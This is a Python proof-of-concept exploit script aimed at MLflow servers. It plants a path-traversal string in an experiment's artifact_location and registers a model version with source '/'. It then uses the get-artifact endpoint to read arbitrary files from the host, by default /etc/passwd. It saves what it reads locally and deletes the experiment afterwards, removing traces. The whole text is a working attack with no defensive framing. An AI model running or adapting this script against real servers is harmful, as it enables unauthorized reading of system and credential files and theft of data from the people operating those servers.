#!/usr/bin/python3
from argparse import ArgumentParser
from random import randbytes
from requests import Session
from urllib.parse import unquote
from pathlib import Path
from os import path

def save_file(full_path,content):
    parent_directory = path.dirname(full_path)
    Path("output"+parent_directory).mkdir(parents=True, exist_ok=True)
    f = open("output"+full_path,"wb")
    f.write(rsp.content)
    f.close()
    print("[+] File saved: output"+full_path)

if __name__ == "__main__":
    parser = ArgumentParser()
    parser.add_argument("--url", required=True)
    parser.add_argument("--path", default="/etc/passwd")
    args = parser.parse_args()

    url = args.url
    ajax_api = f"{url}/ajax-api/2.0/mlflow"

    with Session() as s:
        model_name = "m_" + randbytes(4).hex()
        experiment_name = "e_" + randbytes(4).hex()

        rsp = s.post(f"{ajax_api}/experiments/create", json={
           "name" : experiment_name,
           "artifact_location" : "http:///#../../../../../../../../../../../../../../"
        })
        experiment_id = rsp.json()["experiment_id"]

        rsp = s.post(f"{ajax_api}/runs/create", json={
            "experiment_id" : experiment_id
        })
        run_uuid = rsp.json()["run"]["info"]["run_uuid"]

        rsp = s.post(f"{ajax_api}/registered-models/create", json={
            "name" : model_name
        })

        rsp = s.post(f"{ajax_api}/model-versions/create", json={
            "name" : model_name,
            "run_id" : run_uuid,
            "source": "/"
        })

        rsp = s.get(f"{args.url}/model-versions/get-artifact", params={
            "name" : model_name,
            "version" : 1,
            "path" : args.path.removeprefix("/")
        })

        print("[+] File content for: "+args.path)
        try:
            print(rsp.content.decode())
        except UnicodeDecodeError:
            print(rsp.content)

		# Save the content file
        save_file(args.path,rsp.content)

        rsp = s.post(f"{ajax_api}/experiments/delete", json={
            "experiment_id" : experiment_id
        })
